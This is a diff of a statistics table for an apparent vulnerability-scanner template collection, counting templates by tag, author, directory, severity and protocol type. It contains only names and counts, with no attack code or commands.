696 | info | 625 | http | 1904 | -| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | -| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | -| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | -| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | -| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | -| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | -| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | -| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | -| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | -| cve2021 | 115 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 93 | 0x_akoko | 33 | miscellaneous | 24 | | | | | +| cve | 702 | pikpikcu | 267 | cves | 715 | info | 630 | http | 1930 | +| lfi | 253 | dhiyaneshdk | 253 | vulnerabilities | 291 | high | 546 | file | 46 | +| panel | 248 | daffainfo | 206 | exposed-panels | 248 | medium | 441 | network | 41 | +| xss | 240 | pdteam | 195 | exposures | 187 | critical | 269 | dns | 12 | +| exposure | 228 | geeknik | 151 | technologies | 182 | low | 148 | | | +| wordpress | 212 | dwisiswant0 | 132 | misconfiguration | 132 | | | | | +| rce | 197 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 173 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 162 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 143 | pussycat0x | 58 | workflows | 36 | | | | | +| cve2021 | 123 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 95 | 0x_akoko | 33 | miscellaneous | 24 | | | | | | config | 93 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 82 | organiccrap | 24 | dns | 11 | | | | | -| joomla | 74 | philippedelteil | 23 | cnvd | 9 | | | | | -| apache | 68 | sheikhrishad | 15 | fuzzing | 9 | | | | | -| takeover | 66 | milo2012 | 14 | headless | 5 | | | | | +| cve2018 | 83 | philippedelteil | 25 | dns | 12 | | | | | +| joomla | 77 | organiccrap | 24 | fuzzing | 9 | | | | | +| apache | 69 | sheikhrishad | 15 | cnvd | 9 | | | | | +| takeover | 67 | milo2012 | 14 | headless | 5 | | | | | +| cve2010 | 67 | pr3r00t | 13 | | | | | | | | token | 65 | techbrunchfr | 13 | | | | | | | -| cve2010 | 64 | pr3r00t | 13 | | | | | | | | default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | cyllective | 11 | | | | | | | -| oob | 51 | r3dg33k | 11 | | | | | | | -| cve2017 | 49 | random_robbie | 10 | | | | | | | +| iot | 62 | r3dg33k | 11 | | | | | | | +| oob | 52 | cyllective | 11 | | | | | | | +| cve2017 | 49 | righettod | 10 | | | | | | | | file | 46 | wdahlenb | 10 | | | | | | | -| unauth | 45 | righettod | 10 | | | | | | | +| unauth | 45 | random_robbie | 10 | | | | | | | | network | 41 | nadino | 9 | | | | | | | -| sqli | 38 | hackergautam | 9 | | | | | | | -| | 36 | melbadry9 | 9 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | -| ssrf | 35 | aashiq | 8 | | | | | | | -| cve2016 | 32 | iamthefrogy | 8 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| redirect | 30 | oppsec | 7 | | | | | | | -| jira | 28 | randomstr1ng | 7 | | | | | | | -| atlassian | 27 | dogasantos | 7 | | | | | | | -| listing | 25 | emadshanab | 7 | | | | | | | -| misc | 23 | dr_set | 7 | | | | | | | -| disclosure | 21 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 21 | kophjager007 | 7 | | | | | | | -| auth-bypass | 20 | harshbothra_ | 7 | | | | | | | -| generic | 20 | puzzlepeaches | 6 | | | | | | | +| sqli | 38 | melbadry9 | 9 | | | | | | | +| oracle | 36 | hackergautam | 9 | | | | | | | +| ssrf | 36 | that_juan_ | 8 | | | | | | | +| | 36 | aashiq | 8 | | | | | | | +| cve2016 | 34 | iamthefrogy | 8 | | | | | | | +| redirect | 30 | emadshanab | 7 | | | | | | | +| logs | 30 | harshbothra_ | 7 | | | | | | | +| jira | 28 | dogasantos | 7 | | | | | | | +| atlassian | 27 | dr_set | 7 | | | | | | | +| listing | 25 | kophjager007 | 7 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 21 | techryptic (@tech) | 7 | | | | | | | +| disclosure | 21 | randomstr1ng | 7 | | | | | | | +| auth-bypass | 20 | oppsec | 7 | | | | | | | +| generic | 20 | caspergn | 6 | | | | | | | | router | 19 | __fazal | 6 | | | | | | | -| aem | 19 | meme-lord | 6 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| sap | 18 | logicalhunter | 6 | | | | | | | -| springboot | 17 | yanyun | 5 | | | | | | | -| debug | 16 | elsfa7110 | 5 | | | | | | | -| cve2014 | 15 | iamnoooob | 5 | | | | | | | -| misconfig | 15 | pentest_swissky | 5 | | | | | | | -| cve2011 | 14 | panch0r3d | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| cve2012 | 14 | rootxharsh | 5 | | | | | | | -| login | 14 | ganofins | 5 | | | | | | | -| android | 13 | lu4nx | 4 | | | | | | | -| php | 13 | xelkomy | 4 | | | | | | | -| struts | 13 | github.com/its0x08 | 4 | | | | | | | -| fuzz | 13 | e_schultze_ | 4 | | | | | | | -| adobe | 13 | nodauf | 4 | | | | | | | -| devops | 13 | jarijaas | 3 | | | | | | | -| jenkins | 12 | binaryfigments | 3 | | | | | | | -| dlink | 12 | mavericknerd | 3 | | | | | | | -| dns | 12 | impramodsargar | 3 | | | | | | | -| cve2013 | 11 | vsh00t | 3 | | | | | | | -| zoho | 11 | yash anand @yashanand155 | 3 | | | | | | | -| dell | 10 | johnk3r | 3 | | | | | | | -| aws | 10 | dudez | 3 | | | | | | | -| xxe | 9 | shifacyclewala | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | | | -| ftp | 9 | incogbyte | 3 | | | | | | | -| airflow | 8 | z3bd | 3 | | | | | | | -| ruijie | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | emenalf | 3 | | | | | | | -| nginx | 8 | idealphase | 3 | | | | | | | -| scada | 8 | tess | 3 | | | | | | | -| rails | 8 | _generic_human_ | 3 | | | | | | | -| intrusive | 8 | shine | 3 | | | | | | | -| gitlab | 8 | f1tz | 3 | | | | | | | -| vmware | 7 | thomas_from_offensity | 3 | | | | | | | -| cve2009 | 7 | fyoorer | 3 | | | | | | | -| kubernetes | 7 | hetroublemakr | 2 | | | | | | | -| confluence | 7 | ree4pwn | 2 | | | | | | | -| backup | 7 | koti2 | 2 | | | | | | | -| coldfusion | 7 | bing0o | 2 | | | | | | | -| ibm | 7 | cocxanh | 2 | | | | | | | -| google | 7 | swissky | 2 | | | | | | | -| cms | 7 | 0xprial | 2 | | | | | | | -| netgear | 7 | dheerajmadhukar | 2 | | | | | | | -| files | 7 | lotusdll | 2 | | | | | | | -| rconfig | 6 | whoever | 2 | | | | | | | -| jetty | 6 | w4cky_ | 2 | | | | | | | -| solr | 6 | arcc | 2 | | | | | | | -| laravel | 6 | amsda | 2 | | | | | | | -| citrix | 6 | randomrobbie | 2 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| cisco | 19 | logicalhunter | 6 | | | | | | | +| springboot | 18 | meme-lord | 6 | | | | | | | +| sap | 18 | elsfa7110 | 5 | | | | | | | +| debug | 17 | ganofins | 5 | | | | | | | +| cve2014 | 16 | pentest_swissky | 5 | | | | | | | +| misconfig | 15 | joanbono | 5 | | | | | | | +| weblogic | 14 | rootxharsh | 5 | | | | | | | +| struts | 14 | panch0r3d | 5 | | | | | | | +| cve2011 | 14 | iamnoooob | 5 | | | | | | | +| login | 14 | yanyun | 5 | | | | | | | +| php | 14 | lu4nx | 4 | | | | | | | +| cve2012 | 14 | github.com/its0x08 | 4 | | | | | | | +| dns | 13 | e_schultze_ | 4 | | | | | | | +| devops | 13 | nodauf | 4 | | | | | | | +| fuzz | 13 | xelkomy | 4 | | | | | | | +| zoho | 13 | tess | 3 | | | | | | | +| android | 13 | 0w4ys | 3 | | | | | | | +| adobe | 13 | johnk3r | 3 | | | | | | | +| jenkins | 12 | shine | 3 | | | | | | | +| dlink | 12 | yash anand @yashanand155 | 3 | | | | | | | +| cve2013 | 11 | fyoorer | 3 | | | | | | | +| aws | 11 | z3bd | 3 | | | | | | | +| dell | 10 | idealphase | 3 | | | | | | | +| xxe | 9 | vsh00t | 3 | | | | | | | +| magento | 9 | incogbyte | 3 | | | | | | | +| ftp | 9 | mavericknerd | 3 | | | | | | | +| gitlab | 8 | _generic_human_ | 3 | | | | | | | +| nginx | 8 | jarijaas | 3 | | | | | | | +| rails | 8 | thomas_from_offensity | 3 | | | | | | | +| cnvd | 8 | impramodsargar | 3 | | | | | | | +| ruijie | 8 | dudez | 3 | | | | | | | +| intrusive | 8 | emenalf | 3 | | | | | | | +| airflow | 8 | shifacyclewala | 3 | | | | | | | +| scada | 8 | binaryfigments | 3 | | | | | | | +| kubernetes | 7 | skeltavik | 3 | | | | | | | +| cve2009 | 7 | f1tz | 3 | | | | | | | +| ibm | 7 | gal nagli | 2 | | | | | | | +| google | 7 | bing0o | 2 | | | | | | | +| files | 7 | pxmme1337 | 2 | | | | | | | +| vmware | 7 | fabaff | 2 | | | | | | | +| coldfusion | 7 | manas_harsh | 2 | | | | | | | +| netgear | 7 | ehsahil | 2 | | | | | | | +| wp-theme | 7 | cocxanh | 2 | | | | | | | +| cms | 7 | parth | 2 | | | | | | | +| microsoft | 7 | 0xcrypto | 2 | | | | | | | +| backup | 7 | nkxxkn | 2 | | | | | | | +| confluence | 7 | joeldeleep | 2 | | | | | | | +| cves | 7 | convisoappsec | 2 | | | | | | | +| rconfig | 6 | moritz nentwig | 2 | | | | | | | | django | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | davidmckennirey | 2 | | | | | | | -| cve2008 | 6 | moritz nentwig | 2 | | | | | | | -| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| nodejs | 5 | random-robbie | 2 | | | | | | | -| drupal | 5 | joeldeleep | 2 | | | | | | | -| wp-theme | 5 | socketz | 2 | | | | | | | -| java | 5 | mohammedsaneem | 2 | | | | | | | -| deserialization | 5 | 0xsapra | 2 | | | | | | | -| tomcat | 5 | udit_thakkur | 2 | | | | | | | -| iis | 5 | huowuzhao | 2 | | | | | | | -| jolokia | 5 | ehsahil | 2 | | | | | | | -| lucee | 5 | x1m_martijn | 2 | | | | | | | -| printer | 5 | parth | 2 | | | | | | | -| circarlife | 5 | 0xcrypto | 2 | | | | | | | -| ssti | 5 | r3naissance | 2 | | | | | | | -| microsoft | 5 | gal nagli | 2 | | | | | | | -| windows | 5 | unstabl3 | 2 | | | | | | | -| fileupload | 5 | hahwul | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| headless | 5 | convisoappsec | 2 | | | | | | | -| dedecms | 5 | 0xrudra | 2 | | | | | | | -| strapi | 4 | nkxxkn | 2 | | | | | | | -| proxy | 4 | fabaff | 2 | | | | | | | -| exchange | 4 | manas_harsh | 2 | | | | | | | -| grafana | 4 | afaq | 2 | | | | | | | -| hp | 4 | pxmme1337 | 2 | | | | | | | -| webserver | 4 | sushantkamble | 2 | | | | | | | -| vpn | 4 | g4l1t0 | 2 | | | | | | | -| asp | 4 | zomsop82 | 2 | | | | | | | -| crlf | 4 | bsysop | 2 | | | | | | | -| hongdian | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | johnjhacking | 2 | | | | | | | -| thinkphp | 4 | vavkamil | 2 | | | | | | | -| symfony | 4 | gevakun | 2 | | | | | | | -| elastic | 4 | bp0lr | 2 | | | | | | | -| symantec | 4 | 0xelkomy | 2 | | | | | | | -| moodle | 4 | un-fmunozs | 1 | | | | | | | -| zimbra | 4 | b0rn2r00t | 1 | | | | | | | -| glpi | 4 | mubassirpatel | 1 | | | | | | | -| buffalo | 4 | yavolo | 1 | | | | | | | -| solarwinds | 4 | shifacyclewla | 1 | | | | | | | -| artifactory | 4 | deena | 1 | | | | | | | -| firmware | 4 | akash.c | 1 | | | | | | | -| magmi | 4 | absshax | 1 | | | | | | | -| wso2 | 4 | c3l3si4n | 1 | | | | | | | -| thinkcmf | 4 | geraldino2 | 1 | | | | | | | -| resin | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| samsung | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| cacti | 3 | mah3sec_ | 1 | | | | | | | -| druid | 3 | andysvints | 1 | | | | | | | -| zabbix | 3 | ahmed sherif | 1 | | | | | | | -| ofbiz | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| kevinlab | 3 | remonsec | 1 | | | | | | | -| kibana | 3 | elder tao | 1 | | | | | | | -| opensis | 3 | sicksec | 1 | | | | | | | -| linkerd | 3 | shreyapohekar | 1 | | | | | | | -| bypass | 3 | fmunozs | 1 | | | | | | | -| microstrategy | 3 | vzamanillo | 1 | | | | | | | -| smtp | 3 | andirrahmani1 | 1 | | | | | | | -| mongodb | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| zhiyuan | 3 | bernardo rodrigues | 1 | | | | | | | +| api | 6 | x1m_martijn | 2 | | | | | | | +| laravel | 6 | random-robbie | 2 | | | | | | | +| cve2008 | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| docker | 6 | 0xsapra | 2 | | | | | | | +| solr | 6 | foulenzer | 2 | | | | | | | +| jetty | 6 | mohammedsaneem | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| drupal | 5 | 0xrudra | 2 | | | | | | | +| lucee | 5 | hahwul | 2 | | | | | | | +| java | 5 | kiblyn11 | 2 | | | | | | | +| printer | 5 | dheerajmadhukar | 2 | | | | | | | +| dedecms | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | udit_thakkur | 2 | | | | | | | +| windows | 5 | g4l1t0 | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| deserialization | 5 | lotusdll | 2 | | | | | | | +| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | +| tomcat | 5 | w4cky_ | 2 | | | | | | | +| circarlife | 5 | 0xprial | 2 | | | | | | | +| fileupload | 5 | socketz | 2 | | | | | | | +| jolokia | 5 | davidmckennirey | 2 | | | | | | | +| ssti | 5 | whoever | 2 | | | | | | | +| nodejs | 5 | bsysop | 2 | | | | | | | +| symantec | 4 | huowuzhao | 2 | | | | | | | +| hp | 4 | arcc | 2 | | | | | | | +| webserver | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | unstabl3 | 2 | | | | | | | +| grafana | 4 | ree4pwn | 2 | | | | | | | +| hongdian | 4 | swissky | 2 | | | | | | | +| symfony | 4 | koti2 | 2 | | | | | | | +| firmware | 4 | johnjhacking | 2 | | | | | | | +| wso2 | 4 | hetroublemakr | 2 | | | | | | | +| proxy | 4 | afaq | 2 | | | | | | | +| zimbra | 4 | r3naissance | 2 | | | | | | | +| samsung | 4 | sushantkamble | 2 | | | | | | | +| glpi | 4 | vavkamil | 2 | | | | | | | +| traversal | 4 | gevakun | 2 | | | | | | | +| vpn | 4 | aresx | 1 | | | | | | | +| thinkphp | 4 | shifacyclewla | 1 | | | | | | | +| resin | 4 | intx0x80 | 1 | | | | | | | +| asp | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| crlf | 4 | yashanand155 | 1 | | | | | | | +| solarwinds | 4 | _darrenmartyn | 1 | | | | | | | +| moodle | 4 | ajaysenr | 1 | | | | | | | +| artifactory | 4 | notsoevilweasel | 1 | | | | | | | +| elastic | 4 | 0xtavian | 1 | | | | | | | +| strapi | 4 | smaranchand | 1 | | | | | | | +| buffalo | 4 | fmunozs | 1 | | | | | | | +| thinkcmf | 4 | ilovebinbash | 1 | | | | | | | +| exchange | 4 | willd96 | 1 | | | | | | | +| linkerd | 3 | udyz | 1 | | | | | | | +| openssh | 3 | berkdusunur | 1 | | | | | | | +| log | 3 | thezakman | 1 | | | | | | | +| firebase | 3 | alex | 1 | | | | | | | +| caucho | 3 | rojanrijal | 1 | | | | | | | +| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| bypass | 3 | sickwell | 1 | | | | | | | +| opensis | 3 | defr0ggy | 1 | | | | | | | +| fanruan | 3 | yavolo | 1 | | | | | | | +| openam | 3 | schniggie | 1 | | | | | | | +| tikiwiki | 3 | alph4byt3 | 1 | | | | | | | +| camera | 3 | jteles | 1 | | | | | | | +| mongodb | 3 | mubassirpatel | 1 | | | | | | | +| microstrategy | 3 | geraldino2 | 1 | | | | | | | +| httpd | 3 | zhenwarx | 1 | | | | | | | +| slack | 3 | ldionmarcil | 1 | | | | | | | +| itop | 3 | kba@sogeti_esec | 1 | | | | | | | +| ofbiz | 3 | wabafet | 1 | | | | | | | +| zabbix | 3 | 0h1in9e | 1 | | | | | | | +| nexus | 3 | infosecsanyam | 1 | | | | | | | +| bitrix | 3 | exploitation | 1 | | | | | | | +| druid | 3 | omarkurt | 1 | | | | | | | +| amazon | 3 | un-fmunozs | 1 | | | | | | | +| vbulletin | 3 | akshansh | 1 | | | | | | | +| targa | 3 | nytr0gen | 1 | | | | | | | +| springcloud | 3 | remonsec | 1 | | | | | | | +| npm | 3 | deena | 1 | | | | | | | +| kafka | 3 | streetofhackerr007 | 1 | | | | | | | +| bigip | 3 | furkansenan | 1 | | | | | | | +| injection | 3 | affix | 1 | | | | | | | +| ssh | 3 | cookiehanhoan | 1 | | | | | | | +| backups | 3 | mhdsamx | 1 | | | | | | | +| ebs | 3 | soyelmago | 1 | | | | | | | +| cacti | 3 | ipanda | 1 | | | | | | | +| oa | 3 | push4d | 1 | | | | | | | +| lfr | 3 | fopina | 1 | | | | | | | +| git | 3 | ringo | 1 | | | | | | | +| nacos | 3 | flag007 | 1 | | | | | | | +| zhiyuan | 3 | micha3lb3n | 1 | | | | | | | +| jellyfin | 3 | apt-mirror | 1 | | | | | | | +| kibana | 3 | alperenkesk | 1 | | | | | | | +| kevinlab | 3 | _c0wb0y_ | 1 | | | | | | | +| hoteldruid | 3 | xstp | 1 | | | | | | | +| terramaster | 3 | its0x08 | 1 | | | | | | | +| mail | 3 | juicypotato1 | 1 | | | | | | | +| r-seenet | 3 | chron0x | 1 | | | | | | | +| smtp | 3 | b0yd | 1 | | | | | | | +| telerik | 3 | yashgoti | 1 | | | | | | | +| nosqli | 3 | makyotox | 1 | | | | | | | +| prometheus | 3 | naglinagli | 1 | | | | | | | +| hasura | 2 | retr0 | 1 | | | | | | | +| kong | 2 | sicksec | 1 | | | | | | | +| openfire | 2 | hakluke | 1 | | | | | | | +| oauth | 2 | pudsec | 1 | | | | | | | +| axis2 | 2 | izn0u | 1 | | | | | | | +| smb | 2 | zandros0 | 1 | | | | | | | +| geowebserver | 2 | luskabol | 1 | | | | | | | +| splunk | 2 | petruknisme | 1 | | | | | | | +| azure | 2 | luci | 1 | | | | | | | +| aruba | 2 | b4uh0lz | 1 | | | | | | | +| yapi | 2 | andirrahmani1 | 1 | | | | | | | +| shellshock | 2 | hanlaomo | 1 | | | | | | | +| chiyu | 2 | shelld3v | 1 | | | | | | | +| yii | 2 | c3l3si4n | 1 | | | | | | | +| akamai | 2 | manuelbua | 1 | | | | | | | +| sharepoint | 2 | b0rn2r00t | 1 | | | | | | | +| saltstack | 2 | qlkwej | 1 | | | | | | | +| emerge | 2 | kre80r | 1 | | | | | | | +| qcubed | 2 | d0rkerdevil | 1 | | | | | | | +| avantfax | 2 | bernardofsr | 1 | | | | | | | +| globalprotect | 2 | elmahdi | 1 | | | | | | | +| voipmonitor | 2 | toufik airane | 1 | | | | | | | +| spark | 2 | me9187 | 1 | | | | | | | +| activemq | 2 | 0ut0fb4nd | 1 | | | | | | | +| prestashop | 2 | knassar702 | 1 | | | | | | | +| favicon | 2 | ahmetpergamum | 1 | | | | | | | +| nextjs | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| prometheus | 3 | streetofhackerr007 | 1 | | | | | | | -| r-seenet | 3 | blckraven | 1 | | | | | | | -| springcloud | 3 | co0nan | 1 | | | | | | | -| targa | 3 | @dwisiswant0 | 1 | | | | | | | -| ssh | 3 | kba@sogeti_esec | 1 | | | | | | | -| terramaster | 3 | iampritam | 1 | | | | | | | -| openssh | 3 | b0yd | 1 | | | | | | | -| bigip | 3 | @github.com/defr0ggy | 1 | | | | | | | -| telerik | 3 | jeya seelan | 1 | | | | | | | -| nacos | 3 | ringo | 1 | | | | | | | -| injection | 3 | revblock | 1 | | | | | | | -| camera | 3 | udyz | 1 | | | | | | | -| itop | 3 | s1r1u5_ | 1 | | | | | | | -| httpd | 3 | yashanand155 | 1 | | | | | | | -| log | 3 | naglinagli | 1 | | | | | | | -| firebase | 3 | tim_koopmans | 1 | | | | | | | -| lfr | 3 | ajaysenr | 1 | | | | | | | -| fpd | 3 | ooooooo_q | 1 | | | | | | | -| jellyfin | 3 | thezakman | 1 | | | | | | | -| mail | 3 | alex | 1 | | | | | | | -| caucho | 3 | kabirsuda | 1 | | | | | | | -| fanruan | 3 | petruknisme | 1 | | | | | | | -| vbulletin | 3 | omarkurt | 1 | | | | | | | -| amazon | 3 | knassar702 | 1 | | | | | | | -| kafka | 3 | divya_mudgal | 1 | | | | | | | -| slack | 3 | patralos | 1 | | | | | | | -| nosqli | 3 | d0rkerdevil | 1 | | | | | | | -| backups | 3 | fopina | 1 | | | | | | | -| git | 3 | toufik airane | 1 | | | | | | | -| bitrix | 3 | luci | 1 | | | | | | | -| nexus | 3 | undefl0w | 1 | | | | | | | -| openam | 3 | thevillagehacker | 1 | | | | | | | -| ebs | 3 | exploitation | 1 | | | | | | | -| tikiwiki | 3 | sshell | 1 | | | | | | | -| npm | 3 | bad5ect0r | 1 | | | | | | | -| oa | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| oauth | 2 | bernardofsr | 1 | | | | | | | -| backdoor | 2 | 0xrod | 1 | | | | | | | -| nextjs | 2 | x6263 | 1 | | | | | | | -| axis2 | 2 | pdp | 1 | | | | | | | -| yapi | 2 | defr0ggy | 1 | | | | | | | -| sonarqube | 2 | taielab | 1 | | | | | | | -| igs | 2 | sullo | 1 | | | | | | | -| prestashop | 2 | intx0x80 | 1 | | | | | | | -| leak | 2 | b4uh0lz | 1 | | | | | | | -| paloalto | 2 | 0xteles | 1 | | | | | | | -| adminer | 2 | izn0u | 1 | | | | | | | -| middleware | 2 | regala_ | 1 | | | | | | | -| splunk | 2 | bjhulst | 1 | | | | | | | -| trixbox | 2 | mesaglio | 1 | | | | | | | -| axis | 2 | sec_hawk | 1 | | | | | | | -| odoo | 2 | whynotke | 1 | | | | | | | -| maian | 2 | 0h1in9e | 1 | | | | | | | -| favicon | 2 | philippdelteil | 1 | | | | | | | -| azure | 2 | furkansenan | 1 | | | | | | | -| seeyon | 2 | j33n1k4 | 1 | | | | | | | -| wordfence | 2 | kre80r | 1 | | | | | | | -| idrac | 2 | zhenwarx | 1 | | | | | | | -| icewarp | 2 | alph4byt3 | 1 | | | | | | | -| cve2005 | 2 | ohlinge | 1 | | | | | | | -| rockethchat | 2 | _darrenmartyn | 1 | | | | | | | -| db | 2 | push4d | 1 | | | | | | | -| waf | 2 | 52971 | 1 | | | | | | | -| voipmonitor | 2 | makyotox | 1 | | | | | | | -| nagios | 2 | luskabol | 1 | | | | | | | -| liferay | 2 | ldionmarcil | 1 | | | | | | | -| storage | 2 | ilovebinbash | 1 | | | | | | | -| ilo | 2 | sy3omda | 1 | | | | | | | -| chamilo | 2 | cookiehanhoan | 1 | | | | | | | -| openfire | 2 | wabafet | 1 | | | | | | | -| huawei | 2 | manuelbua | 1 | | | | | | | -| frp | 2 | gboddin | 1 | | | | | | | -| hashicorp | 2 | aresx | 1 | | | | | | | -| shellshock | 2 | _harleo | 1 | | | | | | | -| xxljob | 2 | flag007 | 1 | | | | | | | -| spark | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| smb | 2 | soyelmago | 1 | | | | | | | -| flir | 2 | apt-mirror | 1 | | | | | | | -| saltstack | 2 | berkdusunur | 1 | | | | | | | -| sonicwall | 2 | borna nematzadeh | 1 | | | | | | | -| globalprotect | 2 | kurohost | 1 | | | | | | | -| hjtcloud | 2 | hanlaomo | 1 | | | | | | | -| glassfish | 2 | willd96 | 1 | | | | | | | -| node | 2 | retr0 | 1 | | | | | | | -| ucmdb | 2 | hakluke | 1 | | | | | | | -| dos | 2 | mass0ma | 1 | | | | | | | -| couchdb | 2 | _c0wb0y_ | 1 | | | | | | | -| akkadian | 2 | shelld3v | 1 | | | | | | | -| cache | 2 | tirtha_mandal | 1 | | | | | | | -| mcafee | 2 | pudsec | 1 | | | | | | | -| hasura | 2 | becivells | 1 | | | | | | | -| rstudio | 2 | th3.d1p4k | 1 | | | | | | | -| guacamole | 2 | ipanda | 1 | | | | | | | -| hoteldruid | 2 | affix | 1 | | | | | | | -| jeedom | 2 | sickwell | 1 | | | | | | | -| hostheader-injection | 2 | evolutionsec | 1 | | | | | | | -| natshell | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| plesk | 2 | becivells | 1 | | | | | | | +| cache | 2 | x6263 | 1 | | | | | | | +| adminer | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| paloalto | 2 | mass0ma | 1 | | | | | | | +| sonicwall | 2 | regala_ | 1 | | | | | | | +| flir | 2 | pdp | 1 | | | | | | | +| cve2007 | 2 | thevillagehacker | 1 | | | | | | | +| mida | 2 | ohlinge | 1 | | | | | | | +| webcam | 2 | sshell | 1 | | | | | | | +| netis | 2 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| kong | 2 | notsoevilweasel | 1 | | | | | | | -| nextcloud | 2 | chron0x | 1 | | | | | | | -| status | 2 | ratnadip gajbhiye | 1 | | | | | | | -| fortios | 2 | rodnt | 1 | | | | | | | -| keycloak | 2 | mhdsamx | 1 | | | | | | | -| grav | 2 | ahmetpergamum | 1 | | | | | | | -| mida | 2 | infosecsanyam | 1 | | | | | | | -| ecology | 2 | me9187 | 1 | | | | | | | -| prtg | 2 | qlkwej | 1 | | | | | | | -| jboss | 2 | akshansh | 1 | | | | | | | -| jsf | 2 | raesene | 1 | | | | | | | -| webcam | 2 | noamrathaus | 1 | | | | | | | -| phpcollab | 2 | daviey | 1 | | | | | | | -| geowebserver | 2 | micha3lb3n | 1 | | | | | | | -| netis | 2 | rojanrijal | 1 | | | | | | | -| akamai | 2 | schniggie | 1 | | | | | | | -| showdoc | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| rstudio | 2 | 52971 | 1 | | | | | | | +| nagios | 2 | j33n1k4 | 1 | | | | | | | +| totemomail | 2 | iampritam | 1 | | | | | | | +| liferay | 2 | revblock | 1 | | | | | | | +| prtg | 2 | sy3omda | 1 | | | | | | | +| waf | 2 | ratnadip gajbhiye | 1 | | | | | | | +| mcafee | 2 | @dwisiswant0 | 1 | | | | | | | +| axis | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| chiyu | 2 | elmahdi | 1 | | | | | | | -| service | 2 | smaranchand | 1 | | | | | | | -| hpe | 2 | yashgoti | 1 | | | | | | | -| cve2007 | 2 | 0xtavian | 1 | | | | | | | -| ec2 | 2 | nytr0gen | 1 | | | | | | | -| emerge | 2 | aceseven (digisec360) | 1 | | | | | | | -| pega | 2 | kareemse1im | 1 | | | | | | | -| rockmongo | 2 | adrianmf | 1 | | | | | | | -| dolibarr | 2 | alperenkesk | 1 | | | | | | | -| netsweeper | 2 | bolli95 | 1 | | | | | | | -| harbor | 2 | pratik khalane | 1 | | | | | | | -| bucket | 2 | 0ut0fb4nd | 1 | | | | | | | -| avantfax | 2 | zandros0 | 1 | | | | | | | -| yii | 2 | juicypotato1 | 1 | | | | | | | -| vrealize | 2 | its0x08 | 1 | | | | | | | -| activemq | 2 | jteles | 1 | | | | | | | -| github | 2 | dawid-czarnecki | 1 | | | | | | | -| plesk | 2 | | | | | | | | | -| sharepoint | 2 | | | | | | | | | -| kentico | 2 | | | | | | | | | -| totemomail | 2 | | | | | | | | | -| horde | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | -| expose | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| tika | 1 | 